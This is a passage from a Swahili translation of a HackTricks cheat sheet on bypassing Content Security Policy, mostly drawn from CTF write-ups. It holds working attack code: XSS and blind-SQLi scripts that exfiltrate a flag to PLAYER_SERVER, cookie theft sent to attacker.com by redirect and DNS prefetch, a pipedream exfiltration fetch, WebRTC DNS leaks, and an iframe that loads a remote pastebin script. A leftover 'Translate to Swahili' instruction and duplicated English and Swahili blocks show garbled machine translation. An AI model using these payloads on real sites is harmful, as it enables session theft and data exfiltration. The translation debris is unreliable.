Unaweza kukiuka CSP hii kwa kuchukua data kupitia picha (katika kesi hii XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na kutoa bendera kupitia picha):
```javascript
<script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
```
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)

Ungekuwa unaweza kutumia usanidi huu kwa **kupakia kificho cha javascript kilichoingizwa ndani ya picha**. Kwa mfano, ikiwa ukurasa unaruhusu kupakia picha kutoka Twitter. Unge **unda** picha **maalum**, **ipakie** kwenye Twitter na kutumia "**unsafe-inline**" kutekeleza kificho cha JS (kama XSS ya kawaida) ambacho kitapakia picha, kutoa JS kutoka kwake na kutekeleza **kificho** hicho: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)

### Kwa Wafanyikazi wa Huduma

Kazi ya **`importScripts`** ya wafanyikazi wa huduma haijazuiliwa na CSP:

{% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %}
[abusing-service-workers.md](../xss-cross-site-scripting/abusing-service-workers.md)
{% endcontent-ref %}

### Uingizaji wa Sera

**Utafiti:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)

#### Chrome

Ikiwa **parameta** iliyotumwa na wewe inawekwa **ndani** ya **tamko** la **sera**, basi unaweza **badilisha** sera kwa njia fulani ambayo inafanya **isiwe na maana**. Unaweza **kuruhusu script 'unsafe-inline'** na mojawapo ya njia hizi za kuzidisha:
```bash
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
```
Kwa sababu agizo hili litakua **linafuta maelekezo ya script-src yaliyopo**.\
Unaweza kupata mfano hapa: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)

#### Edge

Katika Edge ni rahisi sana. Ikiwa unaweza kuongeza hili tu kwenye CSP: **`;_`** **Edge** ita **ondoa** sera nzima.\
Mfano: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)

### img-src \*; kupitia XSS (iframe) - Shambulio la Wakati

Tambua ukosefu wa agizo `'unsafe-inline'`\
Wakati huu unaweza kufanya mhanga **apakie** ukurasa katika **udhibiti wako** kupitia **XSS** na `<iframe`. Wakati huu utafanya mhanga ufikie ukurasa kutoka mahali unapotaka kutoa habari (**CSRF**). Huwezi kupata maudhui ya ukurasa, lakini kama kwa njia fulani unaweza **kudhibiti muda ambao ukurasa unahitaji kupakia** unaweza kutoa habari unayohitaji.

Wakati huu **bendera** itaondolewa, kila wakati **herufi inatabiriwa kwa usahihi** kupitia SQLi majibu yanachukua **muda zaidi** kutokana na kazi ya kulala. Kisha, utaweza kutoa bendera:
```html
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name=f id=g></iframe> // The bot will load an URL with the payload
<script>
let host = "http://x-oracle-v1.nn9ed.ka0labs.org";
function gen(x) {
x = escape(x.replace(/_/g, '\\_'));
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`;
}

function gen2(x) {
x = escape(x);
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`;
}

async function query(word, end=false) {
let h = performance.now();
f.location = (end ? gen2(word) : gen(word));
await new Promise(r => {
g.onload = r;
});
let diff = performance.now() - h;
return diff > 300;
}

let alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789'.split('');
let postfix = '}'

async function run() {
let prefix = 'nn9ed{';
while (true) {
let i = 0;
for (i;i<alphabet.length;i++) {
let c = alphabet[i];
let t =  await query(prefix+c); // Check what chars returns TRUE or FALSE
console.log(prefix, c, t);
if (t) {
console.log('FOUND!')
prefix += c;
break;
}
}
if (i==alphabet.length) {
console.log('missing chars');
break;
}
let t = await query(prefix+'}', true);
if (t) {
prefix += '}';
break;
}
}
new Image().src = 'http://PLAYER_SERVER/?' + prefix; //Exfiltrate the flag
console.log(prefix);
}

run();
</script>
```
### Kupitia Bookmarklets

Shambulizi hili lingehusisha uhandisi wa kijamii ambapo muhalifu **anamshawishi mtumiaji kuvuta na kuachia kiungo juu ya bookmarklet ya kivinjari**. Bookmarklet hii ingejumuisha **mimba ya javascript yenye nia mbaya** ambayo ikivutwa na kuachiliwa au bonyezwa ingetekelezwa katika muktadha wa dirisha la wavuti la sasa, **kipuuzia CSP na kuruhusu kuiba habari nyeti** kama vile vidakuzi au vibambo.

Kwa habari zaidi [**angalia ripoti ya asili hapa**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).

### Kupitisha CSP kwa Kizuizi CSP

Katika [**hii CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP inapitishwa kwa kuingiza ndani ya fremu iliyoruhusiwa CSP inayozuia zaidi ambayo ilikataza kupakia faili maalum ya JS ambayo, kisha, kupitia **uchafuzi wa protini** au **dom clobbering** iliruhusu **kutumia hati tofauti kupakia hati ya aina yoyote**.

Unaweza **kizuia CSP ya Iframe** kwa kutumia sifa ya **`csp`**:

{% code overflow="wrap" %}
```html
<iframe src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]" csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
```
{% endcode %}

Katika [**hii CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48), ilikuwa inawezekana kupitia **HTML injection** kurekebisha zaidi **CSP** ili script inayozuia CSTI ifungwe na hivyo **kuwezesha kutumia udhaifu.**\
CSP inaweza kuwa ngumu zaidi kutumia **HTML meta tags** na inline scripts zinaweza kufungwa **kwa kuondoa** **ingizo** kuruhusu **nonce** yao na **kuruhusu script maalum ya inline kupitia sha**:
```html
<meta http-equiv="Content-Security-Policy" content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
```
### Uchukuzi wa JS na Content-Security-Policy-Report-Only

Ikiwa unaweza kufanikiwa kufanya seva itoe kichwa **`Content-Security-Policy-Report-Only`** na **thamani inayodhibitiwa na wewe** (labda kwa sababu ya CRLF), unaweza kufanya ielekeze seva yako na ikiwa **unafunga** **maudhui ya JS** unayotaka kuchukua na **`<script>`** na kwa sababu inawezekana sana `unsafe-inline` haijiruhusiwi na CSP, hii itasababisha **kosa la CSP** na sehemu ya script (yenye habari nyeti) itatumwa kwa seva kutoka kwa `Content-Security-Policy-Report-Only`.

Kwa mfano [**angalia hii CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).

### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
```
### Kuvuja Taarifa na CSP na Iframe

* `Iframe` inaundwa inayoelekeza kwa URL (tuiite `https://example.redirect.com`) ambayo imeruhusiwa na CSP.
* URL hii kisha inaelekeza kwa URL ya siri (k.m., `https://usersecret.example2.com`) ambayo **hairuhusiwi** na CSP.
* Kwa kusikiliza tukio la `securitypolicyviolation`, mtu anaweza kukamata mali ya `blockedURI`. Mali hii inafichua kikoa cha URI iliyozuiwa, kuvuja kikoa cha siri ambacho URL ya awali ilielekeza.

Ni muhimu kufahamu kuwa vivinjari kama Chrome na Firefox wana tabia tofauti katika kushughulikia iframes kuhusiana na CSP, ikisababisha kuvuja kwa taarifa nyeti kutokana na tabia isiyojulikana.

Mbinu nyingine inahusisha kutumia CSP yenyewe kudadisi subdomain ya siri. Mbinu hii inategemea algorithm ya utafutaji wa binary na kurekebisha CSP kuingiza vikoa maalum ambavyo vimezuiliwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri inajumuisha herufi zisizojulikana, unaweza kujaribu subdomains tofauti kwa kubadilisha maelekezo ya CSP kuzuia au kuruhusu subdomains hizi. Hapa kuna sehemu inayoonyesha jinsi CSP inavyoweza kuwekwa ili kurahisisha mbinu hii:
```markdown
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
```
Kwa kufuatilia ni maombi gani yanazuiliwa au kuruhusiwa na CSP, mtu anaweza kupunguza herufi zinazowezekana kwenye subdomain ya siri, hatimaye kufunua URL kamili.

Zote njia zinatumia udhaifu wa utekelezaji wa CSP na tabia katika vivinjari, zikionyesha jinsi sera zenye usalama zinaweza kwa bahati mbaya kufichua taarifa nyeti.

Mbinu kutoka [**hapa**](https://ctftime.org/writeup/29310).

<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>

Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

**Machapisho ya Udukuzi**\
Shiriki na maudhui yanayochimba kina katika msisimko na changamoto za udukuzi

**Taarifa za Udukuzi za Wakati Halisi**\
Endelea kujua na ulimwengu wa udukuzi wenye kasi kupitia habari na ufahamu wa wakati halisi

**Matangazo ya Karibuni**\
Baki mwelewa na tuzo mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa

**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!

## Teknolojia Hatarishi za Kupita Mipaka ya CSP

### Kuzidisha Kibofu cha Majibu cha PHP

PHP inajulikana kwa **kuzidisha majibu hadi herufi 4096** kwa chaguo-msingi. Kwa hivyo, ikiwa PHP inaonyesha onyo, kwa kutoa **data ya kutosha ndani ya maonyo**, **majibu** yatatumiwa **kabla** ya **kichwa cha CSP**, kusababisha kichwa kutozingatiwa.\
Kisha, mbinu inategemea kimsingi **kujaza kibofu cha majibu na maonyo** ili kichwa cha CSP kisitumwe.

Wazo kutoka [**hapa**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).

### Kubadilisha Ukurasa wa Hitilafu

Kutoka [**hapa**](https://blog.ssrf.kr/69) inaonekana ilikuwa inawezekana kupita kwenye ulinzi wa CSP kwa kupakia ukurasa wa hitilafu (labda bila CSP) na kubadilisha maudhui yake.
```javascript
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);
```
### BAADHI + 'self' + wordpress

BAADHI ni mbinu inayotumia XSS (au XSS iliyopunguzwa sana) **katika mwisho wa ukurasa** kwa **kutumia** **mwisho mwingine wa asili.** Hii hufanywa kwa kupakia mwisho ulio hatarini kutoka kwa ukurasa wa mshambuliaji na kisha kusasisha ukurasa wa mshambuliaji kwa mwisho halisi katika asili ile ile unayotaka kutumia. Kwa njia hii **mwisho ulio hatarini** unaweza kutumia kitu cha **`opener`** katika **mzigo** kufikia DOM ya **mwisho halisi wa kutumia**. Kwa maelezo zaidi angalia:

{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md](../xss-cross-site-scripting/some-same-origin-method-execution.md)
{% endcontent-ref %}

Zaidi ya hayo, **wordpress** ina mwisho wa **JSONP** katika `/wp-json/wp/v2/users/1?_jsonp=data` ambao uta**rejea** **data** iliyotumwa kwenye matokeo (kwa kikomo cha herufi, nambari na madokezo tu).

Mshambuliaji anaweza kutumia mwisho huo kufanya **shambulio la BAADHI** dhidi ya WordPress na **kulenga** ndani ya `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` kumbuka kuwa **script** hii ita**pakia** kwa sababu imeruhusiwa na 'self'. Zaidi ya hayo, na kwa sababu WordPress imefungwa, mshambuliaji anaweza kutumia **shambulio la BAADHI** kupitia mwisho wa **kukaribisha** ulio hatarini ambao **unapita kwa CSP** kutoa mamlaka zaidi kwa mtumiaji, kusakinisha programu jalizi mpya...\
Kwa maelezo zaidi kuhusu jinsi ya kufanya shambulio hili angalia [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)

## Kupita Kizuizi cha CSP cha Kufichua

Ikiwa kuna CSP kali ambayo haikuruhusu **kuingiliana na seva za nje**, kuna mambo ambayo unaweza kufanya daima kufichua habari.

### Mahali

Unaweza tu kusasisha mahali pa kutuma habari za siri kwa seva ya mshambuliaji:
```javascript
var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
```
### Lebo ya Meta

Unaweza kuelekeza kwa kuingiza lebo ya meta (hii ni tu kuelekeza, haitavuja maudhui)
```html
<meta http-equiv="refresh" content="1; http://attacker.com">
```
### DNS Prefetch

Ili kupakia kurasa haraka, vivinjari vitahakikisha kutatua majina ya mwenyeji kuwa anwani za IP na kuzihifadhi kwa matumizi ya baadaye.\
Unaweza kuashiria kivinjari kutatua mwenyeji mapema kwa: `<link rel="dns-prefetch" href="kitu.com">`

Unaweza kutumia tabia hii kwa **kutolea nje taarifa nyeti kupitia maombi ya DNS**:
```javascript
var sessionid = document.cookie.split('=')[1]+".";
var body = document.getElementsByTagName('body')[0];
body.innerHTML = body.innerHTML + "<link rel=\"dns-prefetch\" href=\"//" + sessionid + "attacker.ch\">";
```
### Translate to Swahili:

```markdown
## Bypassing CSP using Untrusted CDN

In some cases, the application may load scripts from a CDN that is not whitelisted in the CSP policy. An attacker can host a malicious script on the untrusted CDN and include it in the application to bypass the CSP restrictions.

To bypass CSP using an untrusted CDN, follow these steps:

1. Host a malicious script on an untrusted CDN.
2. Include the malicious script in the application.
3. Load the application and execute the malicious script.

By hosting the malicious script on an untrusted CDN, the attacker can bypass the CSP restrictions and execute arbitrary code in the context of the application.
```

```html
<h2>Kupitisha CSP kwa kutumia CDN isiyoaminika</h2>

Katika baadhi ya kesi, programu inaweza kupakia skripti kutoka kwa CDN ambayo haijatambuliwa kwenye sera ya CSP. Mshambuliaji anaweza kuhifadhi skripti ya uovu kwenye CDN isiyoaminika na kuiongeza kwenye programu ili kupitisha vizuizi vya CSP.

Ili kupitisha CSP kwa kutumia CDN isiyoaminika, fuata hatua hizi:

1. Hifadhi skripti ya uovu kwenye CDN isiyoaminika.
2. Ongeza skripti ya uovu kwenye programu.
3. Pakia programu na tekeleza skripti ya uovu.

Kwa kuhifadhi skripti ya uovu kwenye CDN isiyoaminika, mshambuliaji anaweza kupitisha vizuizi vya CSP na kutekeleza nambari ya kupindukia katika muktadha wa programu.
```
```javascript
const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
```
Ili kuepuka hili kutokea, server inaweza kutuma HTTP header:
```
X-DNS-Prefetch-Control: off
```
{% hint style="info" %}
Inavyoonekana, mbinu hii haifanyi kazi kwenye vivinjari visivyo na kichwa (bots)
{% endhint %}

### WebRTC

Kwenye kurasa kadhaa unaweza kusoma kwamba **WebRTC haitathmini sera ya `connect-src`** ya CSP.

Kwa kweli unaweza _kuvuja_ taarifa kwa kutumia _ombi la DNS_. Angalia nambari hii:
```javascript
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
```
Njia nyingine:
```javascript
var pc = new RTCPeerConnection({
"iceServers":[
{"urls":[
"turn:74.125.140.127:19305?transport=udp"
],"username":"_all_your_data_belongs_to_us",
"credential":"."
}]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
```
## Kuangalia Sera za CSP Mkondoni

* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
* [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)

## Kiotomatiki Kuunda CSP

[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)

## Marejeo

* [https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/](https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/)
* [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
* [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
* [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
* [https://www.youtube.com/watch?v=MCyPuOWs3dg](https://www.youtube.com/watch?v=MCyPuOWs3dg)
* [https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/](https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/)
* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)

​

<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>

Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kushirikiana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

**Machapisho ya Udukuzi**\
Shiriki na yaliyomo yanayochimba katika msisimko na changamoto za udukuzi

**Taarifa za Udukuzi za Wakati Halisi**\
Kaa up-to-date na ulimwengu wa udukuzi wenye kasi kupitia habari za wakati halisi na ufahamu

**Matangazo ya Karibuni**\
Baki mwelekezi na tuzo mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa

**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!

<details>

<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>